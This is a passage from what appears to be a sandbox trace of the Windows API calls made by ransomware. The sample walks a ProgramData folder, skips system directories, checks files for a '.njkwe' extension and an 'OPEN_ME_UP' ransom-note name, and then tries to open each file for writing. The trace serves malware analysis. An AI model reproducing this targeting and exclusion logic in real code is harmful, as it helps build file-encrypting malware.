hTemplateFile=0x0) returned 0xffffffff [0073.379] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7776347, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e15dbbf, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbbc2bb3b, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", cAlternateFileName="9984EC~1.XML")) returned 1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="Windows") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="$Recycle.bin") returned 1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="System Volume Information") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="Program Files") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="Program Files (x86)") returned -1 [0073.379] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml") returned 96 [0073.379] StrStrIW (lpFirst="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpSrch=".njkwe") returned 0x0 [0073.379] lstrcmpW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.379] lstrcmpW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpString2="taridd") returned -1 [0073.379] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.379] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7776347, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e1f64ee, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbbb6d045, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", cAlternateFileName="9984EC~2.XML")) returned 1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="Windows") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="Program Files") returned -1 [0073.379] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.379] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml") returned 100 [0073.379] StrStrIW (lpFirst="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.379] lstrcmpW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.379] lstrcmpW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="taridd") returned -1 [0073.379] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.379] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc779c570, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e24298b, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb9eacc8c, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x433c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", cAlternateFileName="ACAE42~1.XML")) returned 1 [0073.379] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="Windows") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="$Recycle.bin") returned 1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="System Volume Information") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="Program Files") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="Program Files (x86)") returned -1 [0073.380] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml") returned 96 [0073.380] StrStrIW (lpFirst="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpSrch=".njkwe") returned 0x0 [0073.380] lstrcmpW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.380] lstrcmpW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="taridd") returned -1 [0073.380] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.380] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.380] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc779c570, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e28ee3c, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xba09c6cc, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x443f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", cAlternateFileName="ACAE42~2.XML")) returned 1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="Windows") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="Program Files") returned -1 [0073.380] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.380] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml") returned 100 [0073.381] StrStrIW (lpFirst="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.381] lstrcmpW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.381] lstrcmpW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="taridd") returned -1 [0073.381] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.381] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.381] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc779c570, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e2b5071, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb8d3a091, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x442d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", cAlternateFileName="C08025~1.XML")) returned 1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="Windows") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="$Recycle.bin") returned 1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="System Volume Information") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="Program Files") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="Program Files (x86)") returned -1 [0073.381] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml") returned 96 [0073.381] StrStrIW (lpFirst="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpSrch=".njkwe") returned 0x0 [0073.381] lstrcmpW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.381] lstrcmpW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="taridd") returned -1 [0073.381] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.381] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.381] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77c27a6, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e2db2dd, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb8c553ea, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4187, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", cAlternateFileName="C08025~2.XML")) returned 1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="Windows") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="Program Files") returned -1 [0073.381] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.381] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml") returned 100 [0073.381] StrStrIW (lpFirst="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.381] lstrcmpW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.381] lstrcmpW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="taridd") returned -1 [0073.381] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.382] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.382] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77c27a6, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e301522, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbb0b32d3, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", cAlternateFileName="E80C85~1.XML")) returned 1 [0073.382] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="Windows") returned -1 [0073.382] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="$Recycle.bin") returned 1 [0073.382] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="System Volume Information") returned -1 [0073.382] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="Program Files") returned -1 [0073.382] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="Program Files (x86)") returned -1 [0073.382] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml") returned 96 [0073.382] StrStrIW (lpFirst="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpSrch=".njkwe") returned 0x0 [0073.382] lstrcmpW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.382] lstrcmpW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="taridd") returned -1 [0073.382] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.382] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.383] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77e89d5, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e34d9d0, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbaf35d10, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4172, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", cAlternateFileName="E80C85~2.XML")) returned 1 [0073.383] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="Windows") returned -1 [0073.383] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.383] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.383] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="Program Files") returned -1 [0073.383] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.383] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml") returned 100 [0073.383] StrStrIW (lpFirst="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.383] lstrcmpW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.383] lstrcmpW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="taridd") returned -1 [0073.383] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.383] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.384] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c930e8, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4e399e7e, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x8507a310, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5c3a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", cAlternateFileName="E9D217~1.XML")) returned 1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="Windows") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="$Recycle.bin") returned 1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="System Volume Information") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="Program Files") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="Program Files (x86)") returned -1 [0073.384] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned 96 [0073.384] StrStrIW (lpFirst="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpSrch=".njkwe") returned 0x0 [0073.384] lstrcmpW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.384] lstrcmpW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="taridd") returned -1 [0073.384] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.384] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.384] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c930e8, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4e458a8d, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x85007c03, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x424c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", cAlternateFileName="E9D217~2.XML")) returned 1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="Windows") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="Program Files") returned -1 [0073.384] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.384] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned 100 [0073.384] StrStrIW (lpFirst="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.384] lstrcmpW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.384] lstrcmpW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2="taridd") returned -1 [0073.384] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.384] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml"), 